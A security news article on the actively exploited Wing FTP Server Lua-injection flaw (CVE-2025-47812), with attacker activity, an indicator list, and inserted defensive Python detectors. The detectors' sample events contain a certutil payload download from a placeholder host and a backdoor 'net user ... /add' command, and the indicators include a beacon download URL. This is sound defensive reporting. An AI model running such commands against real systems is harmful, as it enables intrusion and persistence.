Categories: Cyber Security News

Wing FTP Server RCE Vulnerability Actively Exploited in the Wild

Security researchers at Huntress have confirmed active exploitation of a critical remote code execution vulnerability in Wing FTP Server, designated CVE-2025-47812, occurring just one day after its public disclosure.

This rapid weaponization of the vulnerability demonstrates the urgent need for organizations to update their systems immediately to prevent potential compromise.

Zero-Day Window Exploitation

The vulnerability, first publicly disclosed on June 30, 2025, by security researcher Julien Ahrens, affects all versions of Wing FTP Server prior to 7.4.4.

Huntress security teams detected the first exploitation attempt on July 1, 2025, at 16:15 UTC, marking an extremely short window between disclosure and active attacks.

This timeline underscores the sophisticated nature of modern threat actors who can quickly develop and deploy exploits for newly disclosed vulnerabilities.

CVE-2025-47812 is classified as a null byte and Lua injection flaw that enables attackers to achieve root or SYSTEM-level remote code execution.

The vulnerability stems from improper handling of null bytes in the username parameter, specifically within the loginok.html file that manages the authentication process.

Process tree for the incident showing the involvement of WFTPServer.exe

This flaw allows remote attackers to inject malicious Lua code after inserting a null byte in the username field, effectively bypassing security controls and executing arbitrary commands on the target system.

Wing FTP Server, a widely used file transfer server that runs on Windows, Linux, and macOS, serves as a critical component in many organizations' file sharing infrastructure.

The widespread deployment of this software makes the vulnerability particularly concerning for enterprise environments where file transfer services are essential for business operations.
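The request pattern described above (a null byte in the username sent to loginok.html) can be checked for in proxy or web-server request logs, and the affected-version rule can be encoded for inventory checks. The following is an added detection example, not code from the article or from Wing FTP Server; the request records are constructed samples, and the function names are assumptions.

```python
"""Added example: flag Wing FTP Server login requests whose username field
carries a null byte (the CVE-2025-47812 pattern) and test version strings
against the fixed release 7.4.4. All sample data below is constructed."""
import re
from urllib.parse import parse_qs

# Constructed (path, raw POST body) records standing in for request logs.
SAMPLE_REQUESTS = [
    ("/loginok.html", "username=alice&password=Summer2025"),      # normal login
    ("/loginok.html", "username=anonymous%00&password=x"),        # NUL after username
    ("/loginok.html", "username=bob%00junk&password=pw"),         # NUL mid-username
    ("/login.html", "username=anonymous%00&password=x"),          # not the vulnerable endpoint
    ("/loginok.html", "username=%2500carol&password=pw"),         # double-encoded: decodes to literal '%00'
]


def username_has_null_byte(body: str) -> bool:
    """True if the once-URL-decoded username field contains a NUL (0x00).

    The server percent-decodes once, so a double-encoded %2500 becomes the
    text '%00', not a NUL byte, and is deliberately not flagged here."""
    fields = parse_qs(body, keep_blank_values=True)
    return any("\x00" in value for value in fields.get("username", []))


def is_login_endpoint(path: str) -> bool:
    """Match the loginok.html handler regardless of case or prefix path."""
    return path.rstrip("/").lower().endswith("/loginok.html")


def flag_suspicious(requests):
    """Return the (path, body) records that match the exploit pattern."""
    return [(p, b) for p, b in requests
            if is_login_endpoint(p) and username_has_null_byte(b)]


def is_vulnerable_version(version: str) -> bool:
    """All versions prior to 7.4.4 are affected, per the advisory."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)", version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(x) for x in m.groups()) < (7, 4, 4)


if __name__ == "__main__":
    for path, body in flag_suspicious(SAMPLE_REQUESTS):
        print("suspicious login request:", path, body)
    for v in ("7.4.3", "7.4.4", "7.5.0"):
        print(v, "vulnerable" if is_vulnerable_version(v) else "patched")
```

Running the block on the constructed records flags only the two loginok.html requests whose username decodes to contain a NUL byte; feed it the POST bodies from your own request logs to hunt for attempts against unpatched hosts.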

Sophisticated Attack Chain

The exploitation observed by Huntress researchers demonstrates a multi-stage attack methodology that reveals both the sophistication of the threat actors and some operational security mistakes.

The attack begins with a specially crafted POST request to the loginok.html endpoint, where attackers use either known credentials or anonymous accounts to establish a session.

The malicious payload includes a null byte (%00) to break string processing, followed by carefully constructed Lua code designed to execute system commands.

Analysis of the compromised system revealed that multiple threat actors attempted to exploit the vulnerability throughout the day, with at least five different IP addresses involved in the attacks.

View of webhook showing the victim’s machine had successfully connected

The threat actors employed various techniques and demonstrated varying levels of competency:

  • Reconnaissance Activities: Executed system information gathering commands, including ipconfig, whoami, arp -a, and nslookup to map the target environment.
  • Persistence Attempts: Created new user accounts with usernames “wingftp” and “wing,” using weak passwords that follow predictable patterns like “123123qweqwe.”
  • Remote Access Tool Deployment: Attempted to install ScreenConnect remote management software to maintain persistent access to the compromised system.
  • Malware Distribution: Tried to download and execute malicious payloads using certutil commands, demonstrating familiarity with living-off-the-land techniques.
  • Operational Errors: Made several technical mistakes, including malformed commands and typos that hindered their attack progression and revealed their varying skill levels.
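The post-exploitation steps listed above all run as child processes of the FTP service, which is what the process tree in the incident shows. The following is an added endpoint-side triage example, not code from Huntress or the article; it tags constructed process events whose parent is WFTPServer.exe and whose command lines match the reconnaissance, account-creation, certutil download, and ScreenConnect behaviours described. Event field names, the placeholder download URL, and the function names are assumptions.

```python
"""Added example: tag process-creation events spawned by WFTPServer.exe that
match the post-exploitation behaviours described in the article.
Sample events are constructed, not real telemetry."""
import re

WING_PARENT = "wftpserver.exe"
BACKDOOR_USERS = {"wing", "wingftp"}          # usernames seen created in the incident
# Command-line patterns, each tagged with the attack phase it indicates.
PATTERNS = [
    ("recon", re.compile(r"\b(ipconfig|whoami|arp\s+-a|nslookup)\b", re.I)),
    ("persistence-account", re.compile(r"\bnet1?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("download-certutil", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b", re.I)),
    ("remote-access-tool", re.compile(r"screenconnect.*\.msi|msiexec.*\.msi", re.I)),
]

# Constructed events: parent image, child image, child command line.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Wing FTP Server\WFTPServer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami && ipconfig"},
    {"parent": r"C:\Program Files\Wing FTP Server\WFTPServer.exe",
     "image": r"C:\Windows\System32\net.exe", "cmdline": "net user wingftp 123123qweqwe /add"},
    {"parent": r"C:\Program Files\Wing FTP Server\WFTPServer.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -f http://PLACEHOLDER-HOST/payload %TEMP%\\x.exe"},
    {"parent": r"C:\Windows\explorer.exe",                      # benign parent: ignored
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(event: dict) -> list:
    """Return tags for one event, or [] when the parent is not WFTPServer.exe."""
    if basename(event["parent"]) != WING_PARENT:
        return []
    tags = ["child-of-wftpserver"]   # any child of the FTP daemon deserves a look
    cmd = event["cmdline"]
    tags += [tag for tag, rx in PATTERNS if rx.search(cmd)]
    m = re.search(r"\bnet1?\s+user\s+(\S+)", cmd, re.I)
    if m and m.group(1).lower() in BACKDOOR_USERS:
        tags.append("known-backdoor-username")
    return tags


def triage_all(events: list) -> list:
    """(child image name, tags) for every event that warrants attention."""
    results = []
    for e in events:
        tags = triage(e)
        if tags:
            results.append((basename(e["image"]), tags))
    return results
```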

Indicators of Compromise (IOCs):

1st attacker IP: 223.160.131[.]104
2nd attacker IP: 149.248.44[.]88
3rd attacker IP: 103.88.141[.]42
4th (bumbling) attacker IP: 185.196.9[.]225
5th attacker IP: 146.70.11[.]39
Webhook site: https://webhook[.]site/5d112487-6133-4942-ac87-3f473d44bd81
Password used for attacker accounts: 123123qweqwe
Password used for one attacker account: 123123qweqweq
Backdoor username created by attacker: wing
Backdoor username created by attacker: wingftp
Beacon URL: http://185.196.9[.]225:8080/EOp45eWLSp5G5Uwp_yOCiQ %TEMP%\mvveiWJHx.exe
Beacon file path: %TEMP%\mvveiWJHx.exe
Beacon SHA256: c637ec00bd22da4539ec6def89cd9f7196a303d17632b1131a89d65e4f5698f4
Microsoft Defender detection: Trojan:Win32/Ceprolad.A
ScreenConnect installer URL: https://oooooooo11.screenconnect[.]com/bin/screenconnect.clientsetup.msi
ScreenConnect installer path: c:1.msi
ScreenConnect installer SHA256: f0fcc638cd93bdd6fb4745d75b491395a7a1b2cb08e0153a2eb417cb2f58d8ac
ScreenConnect callback URL: instance-y9tbyl-relay.screenconnect[.]com


The post Wing FTP Server RCE Vulnerability Actively Exploited in the Wild appeared first on Cyber Security News.

rssfeeds-admin
